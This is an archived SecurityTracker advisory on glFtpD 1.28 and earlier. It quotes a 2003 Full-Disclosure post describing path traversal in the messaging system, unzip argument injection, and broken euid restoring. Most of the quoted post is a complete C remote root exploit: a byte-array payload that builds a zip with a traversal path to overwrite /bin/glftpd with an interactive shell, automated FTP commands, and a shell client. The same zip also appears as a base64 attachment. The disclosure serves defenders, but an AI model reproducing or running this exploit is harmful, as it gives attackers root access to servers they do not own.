Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
|
|
|
|
|
|
|
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
|
|
|
|
Become a Partner and License Our Database or Notification Service
|
|
|
|
|
|
|
|
|
|
|
|
|
|
glFtpD FTP Server Bugs Let Remote Authenticated Users Gain Root Level Access
|
|
SecurityTracker Alert ID: 1006146 |
|
CVE Reference: GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Feb 22 2003
|
Impact: Modification of system information, Modification of user information, Root access via network
|
Exploit Included: Yes
|
Version(s): 1.28 and prior versions
|
Description: Several vulnerabilities were reported in the glFtpD FTP server software. A remote authenticated user can obtain root access on the target server.
It is reported that a remote authenticated user can write to arbitrary files with an effective uid of "0". Due to a bug, the messaging
system allows authenticated users to append a formatted line to any file on the system. To send a message, the software will open
the file '/ftp-data/users/<username>' in append mode and write the formatted line. The remote user can set the target 'username'
to the desired target file (e.g., "../../site/incoming/file"). Then, the system will write the formatted line to the target file
instead of the username file.
A remote authenticated user is, by design, permitted to check, list, and verify uploaded zip files
using 'unzip'. However, the user can create specially crafted command arguments to cause the unzip program to extract files. A
demonstration exploit is provided:
site ziplist --l --v file
It is also reported that certain configuration files are root
owned files, requiring that the software change its effective user id (euid) to manipulate the files. According to the report,
the software temporarily changes the euid but does not properly restore the old euid in a certain case.
A demonstration remote
root exploit script is provided in the Source Message.
|
Impact: A remote authenticated user can write to files on the system with root privileges, letting the remote authenticated user gain root access on the target server.
|
Solution: No solution was available at the time of this entry.
The author of the report indicates that in version 1.26, the site [nfo|ziplist|zipchk] command was "disabled and changed".
|
Vendor URL: www.glftpd.org/ (Links to External Site)
|
Cause: Access control error, Input validation error, State error
|
Underlying OS: Linux (Any), UNIX (AIX), UNIX (FreeBSD), UNIX (NetBSD), UNIX (OpenBSD), UNIX (Solaris - SunOS)
|
Reported By: appelast@bsquad.sm.pl
|
Message History:
None.
|
Source Message Contents
|
Date: Fri, 21 Feb 2003 20:12:08 +0100
From: Karol =?iso-8859-2?Q?Wi=EAsek?= <appelast@bsquad.sm.pl>
Subject: [Full-Disclosure] multiple vulnerabilities in glftpd
|
This is a multi-part message in MIME format.
--------------BFCCE4E51E8A3E5D3CF84F69
Content-Type: text/plain; charset=iso-8859-2
Content-Transfer-Encoding: 8bit
-----BEGIN PGP SIGNED MESSAGE-----
* MULTIPLE VULNERABILITIES IN GLFTPD *
I. BACKGROUND
Glftpd is a ftpd server, but it wasn't designed as a replacement
of fptd server. It is a kind of warez ftpd ( like serv-u, war-ftpd ).
It has its own users, groups etc. ( it doesn't use system files ).
It has built in request and message system, which allow to
communicate
betwen users. After connecting it chroots, and moreover users are
chrooted
second time. The second chroot is not typical chroot ( for example
commands
could modify files outside of chroot ), but users can not get out of
it.
II. DESCRIPTION
1) Writing to any file with effective uid equal 0
Messaging system which allows users to communicate each other is
vulnerable to
simple attack, which allows any logged user to apend his own line (
unfortunatly
formatted - which dissallows uid escalation ) to any file.
Sending messages uses following algoritm :
* Check if user exists by stat'ing /ftp-data/users/username
where username is not checked at all.
* Open file /ftp-data/users/username in append mode and write
formatted line.
Attacker by setting destination username to
"../../site/incoming/file"
could destroy target file ( f.ex. zipfile ).
2) Unpacking uploaded files
Version 1.25 allows users to check, list and varify uploaded zip
files
using unzip. This id done using following commands.
System command Glftpd command
unzip -tqq file site zipchk file
unzip -l -v file site ziplist file
unzip -p -C file *.nfo *.NFO site nfo file
There is possibility to pass filename with additional parameters to
unzip.
Unfortunatly unzip dissallows to mix parameters, so extracting uor
file is
rather impossible, but really ???
After checking argument parsing function in unzip we discover that
there is
an easy way to trick unzip, using the following command we obligate
unzip
to extract our file.
unzip -l -v --l --v file
( for more details see unzip.c )
So, command site ziplist --l --v file, extracts our file
3) Bad euid restoring
All config, messages, help files are owned by root, so any password,
tagline
changing, message sending are connected with temporary changing of
euid.
There is one situation where restoring old euid is broken.
On first console :
[root@siuwax /]# ftp siuwax 221
username: appelast
password: v
On second console :
[root@siuwax /]# ps -axu | grep glftpd
#100 1301 0.1 0.9 2568 1196 ? S 17:08 0:00
glftpd:siuwax: appelast
[root@siuwax /]# strace -f -p 1301 -o gl-onel-log
Back to first :
>site onel k
Back to second :
^C
[root@siuwax /]# ps -axu | grep glftpd
root 1301 0.0 0.9 2580 1212 ? S 17:08 0:00
glftpd:siuwax: appelast
Oh, what happened :> ??
[root@siuwax /]# cat gl-onel-log
1301 read(0, "SITE onel k\r\n", 1024) = 16
1301 alarm(900) = 888
1301 getuid() = 0
1301 getpid() = 1301
1301 rt_sigprocmask(SIG_BLOCK, ~[STKFLT CONT PWR RT_0 RT_1 RT_2 RT_3
RT_4 RT_5 RT_6 RT_7 RT_8 RT_9 RT_10 RT_11 RT_12 RT_13 RT_14 RT_15
RT_16 RT_17 RT_18 RT_19 RT_20 RT_21 RT_22 RT_23 RT_24 RT_25 RT_26
RT_27 RT_28 RT_29 RT_30], [], 8) = 0
- -HERE FIRST-> 1301 setresuid(ruid 4294967295, euid 0, suid
4294967295) = 0
1301 open("/ftp-data/misc/oneliners.1301.temp",
O_WRONLY|O_CREAT|O_TRUNC, 0666) = 6
1301 open("/ftp-data/misc/oneliners", O_RDONLY) = 7
1301 fstat(7, {st_mode=S_IFREG|0666, st_size=428, ...}) = 0
1301 old_mmap(NULL, 4096, PROT_READ|PROT_WRITE,
MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x4015e000
1301 read(7, "appelast 10409213"..., 4096) = 428
1301 read(7, "", 4096) = 0
1301 fstat(6, {st_mode=S_IFREG|0666, st_size=0, ...}) = 0
1301 old_mmap(NULL, 4096, PROT_READ|PROT_WRITE,
MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x4015f000
1301 time(NULL) = 1040922613
1301 close(7) = 0
1301 munmap(0x4015e000, 4096) = 0
1301 write(6, "appelast 10409213"..., 535) = 535
1301 close(6) = 0
1301 munmap(0x4015f000, 4096) = 0
1301 unlink("/ftp-data/misc/oneliners") = 0
1301 rename("/ftp-data/misc/oneliners.1301.temp",
"/ftp-data/misc/oneliners") = 0
- -HERE SECOND-> 1301 setresuid(ruid 4294967295, euid 0, suid
4294967295) = 0
1301 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
1301 write(1, "200 Your oneliner has been added"..., 35) = 35
1301 rt_sigaction(SIGALRM, {0x8058f60, [ALRM],
SA_RESTART|0x4000000}, {0x8058f60, [ALRM], SA_RESTART|0x4000000}, 8)
= 0
1301 gettimeofday({1040922613, 745799}, NULL) = 0
1301 time([1040922613]) = 1040922613
1301 read(0, <unfinished ...>
Probably second setresuid should set euid to 100, but it doesn't.
III. ANALYSIS
Logged users could append to any file destroying it ( it could be
fixed by manualy editing ).
Also logged users could gain root privileges in chroot, and also in
all system ( see PoC ).
Glftpd is a warez ftpd, and there is often practised look only
acounts ( for everyone ), which
also allows expliting.
IV. PROOF OF CONCEPT
Root compromise with glftpd 1.25 ( Linux )
[root@siuwax /]# ftp 127.0.0.1 221
username : appelast
password : v
>cd incoming
>put kkk.zip
>site onel
>site ziplist --l --v -o kkk.zip
>quit
[root@siuwax /]# telnet 127.0.0.1 221
bash#
File kkk.zip is prepared to overwrite /bin/glftpd, which is envoked
from xinetd with uid=0.
And contains :
#!/bin/sh
sh -i
V. DETECTION
Glftpd 1.25 is confirmed vulnerable to all 3 attacks, since Glftpd
1.26
commands site [nfo|ziplist|zipchk] was disabled and changed, but rest
2 bugs
are present in all version including newest 1.28.
VI. EXAMPLE EXPLOIT
/*
Glftpd 1.25 PoC remote root exploit
appelast [appelast-at-bsquad.sm.pl]
We don't need writable directory to
upload our file, we change our euid
before it to 0 :>
*/
#define TMP_ZIP "/tmp/kakaka.zip"
#define TMP_CMDS "/tmp/glcmds"
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
// shellcode ;)
signed int
shellcode[221]={80,75,3,4,10,0,0,0,0,0,83,125,-102,45,98,68,108,-96,15
,0,0,0,15,0,0,0,37,0,21,0,46,46,47,46,46,47,46,46,47,46,46,47,46,46,47
,46,46,47,46,46,47,46,46,47,46,46,47,98,105,110,47,103,108,102,116,112
,100,85,84,9,0,3,110,35,11,62,-33,99,11,62,85,120,4,0,0,0,0,0,35,33,47
,98,105,110,47,115,104,10,115,104,32,45,105,80,75,1,2,23,3,10,0,0,0,0,
0,83,125,-102,45,98,68,108,-96,15,0,0,0,15,0,0,0,37,0,13,0,0,0,0,0,1,0
,0,0,-19,-127,0,0,0,0,46,46,47,46,46,47,46,46,47,46,46,47,46,46,47,46,
46,47,46,46,47,46,46,47,46,46,47,98,105,110,47,103,108,102,116,112,100
,85,84,5,0,3,110,35,11,62,85,120,0,0,80,75,5,6,0,0,0,0,1,0,1,0,96,0,0,
0,103,0,0,0,0,0};
void usage(char *progname) {
printf("Glftpd 1.25 remote root exploit\n"
"appelast [appelast-at-bsquad.sm.pl]\n"
"usage : %s host port user password\n\n"
,progname);
int openhost(char *host,int port) {
int sock;
struct sockaddr_in addr;
struct hostent *he;
he=gethostbyname(host);
if (he==NULL) return -1;
sock=socket(AF_INET, SOCK_STREAM, getprotobyname("tcp")->p_proto);
if (sock==-1) return -1;
memcpy(&addr.sin_addr, he->h_addr, he->h_length);
addr.sin_family=AF_INET;
addr.sin_port=htons(port);
if(connect(sock, (struct sockaddr *)&addr, sizeof(addr)) == -1)
sock=-1;
return sock;
void openshell(int sock)
char buf[1024];
fd_set rset;
int i;
while (1)
{
FD_ZERO(&rset);
FD_SET(sock,&rset);
FD_SET(STDIN_FILENO,&rset);
select(sock+1,&rset,NULL,NULL,NULL);
if (FD_ISSET(sock,&rset))
{
i=read(sock,buf,1024);
if (i <= 0)
{
printf("The connection was closed!\n");
exit(0);
}
buf[i]=0;
puts(buf);
}
if (FD_ISSET(STDIN_FILENO,&rset))
{
i=read(STDIN_FILENO,buf,1024);
if (i>0)
{
buf[i]=0;
write(sock,buf,i);
}
}
}
int main(int argc, char *argv[]) {
int fd, i;
char buf[1024];
char user[25], pass[25];
memset(buf,0,1024);
usage(argv[0]);
if (argc!=5)
exit(0);
snprintf(user, 24,"%s", argv[3]);
snprintf(pass, 24,"%s", argv[4]);
printf("Creating evil .zip file : ");
fd = open(TMP_ZIP,O_RDWR|O_CREAT|O_TRUNC,0600);
if (fd<0)
{
perror("open");
exit(0);
}
for (i=0; i<221; i++)
{
(int)buf[0]=shellcode[i];
buf[1]=0;
write(fd,buf,1);
}
close(fd);
printf("DONE\n");
printf("Creating commands file : ");
fd = open(TMP_CMDS,O_RDWR|O_CREAT|O_TRUNC,0600);
if (fd<0)
{
perror("open");
exit(0);
}
sprintf(buf,"quote user %s\n"
"quote pass %s\n"
"site onel hellou\n"
"put %s %s\n"
"site ziplist --l --v -o %s\n"
"del %s\n", user, pass, TMP_ZIP, strrchr(TMP_ZIP, 0x2f)+1,
strrchr(TMP_ZIP, 0x2f)+1, strrchr(TMP_ZIP, 0x2f)+1);
write(fd, buf, strlen(buf));
close(fd);
printf("DONE\n");
printf("Exploiting ... ");
snprintf(buf, 1023, "ftp -n %s %i < /tmp/glcmds", argv[1],
atoi(argv[2]));
system(buf);
unlink(TMP_ZIP);
unlink(TMP_CMDS);
printf("DONE\n");
printf("Connecting to rootshell\n");
openshell(openhost(argv[1],atoi(argv[2])));
return 0;
}
- --
Karol Więsek [appelast-at-bsquad.sm.pl]
http://bsquad.sm.pl/
"Knajpa: miejsce, dokąd się co wieczór chodzi po raz ostatni w
życiu."
-----BEGIN PGP SIGNATURE-----
Version: PGP 6.5.8
Comment: Bear Software, LLC, http://bear-software.freeservers.com
iQCVAwUBPlZr+EKKOIVhErCVAQHOiAQApG2CCAN7bqj4DPbY4ovTAXn2nvt8Gw8L
/+rpo68lJQfnlkDJzdxmlAS/PW+NIvGD6Jr0/Y5E/WPJpinDRFiEAfrMZGuzCO2F
9Swkv5mD6k0UDyTNBq3gwRRrzU6nzGSxfDQ/6kpD0SDIAQRB1JpK/7vFC0cKG8nT
OIn1+sgxHqg=
=UJ1c
-----END PGP SIGNATURE-----
--------------BFCCE4E51E8A3E5D3CF84F69
Content-Type: application/x-zip-compressed;
name="kkk.zip"
Content-Transfer-Encoding: base64
Content-Disposition: inline;
filename="kkk.zip"
UEsDBAoAAAAAAFN9mi1iRGygDwAAAA8AAAAQABUALi4vLi4vYmluL2dsZnRwZFVUCQADbiML
PnkjCz5VeAQAAAAAACMhL2Jpbi9zaApzaCAtaVBLAQIXAwoAAAAAAFN9mi1iRGygDwAAAA8A
AAAQAA0AAAAAAAEAAADtgQAAAAAuLi8uLi9iaW4vZ2xmdHBkVVQFAANuIws+VXgAAFBLBQYA
AAAAAQABAEsAAABSAAAAAAA=
--------------BFCCE4E51E8A3E5D3CF84F69--
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
|
|
Go to the Top of This SecurityTracker Archive Page
|
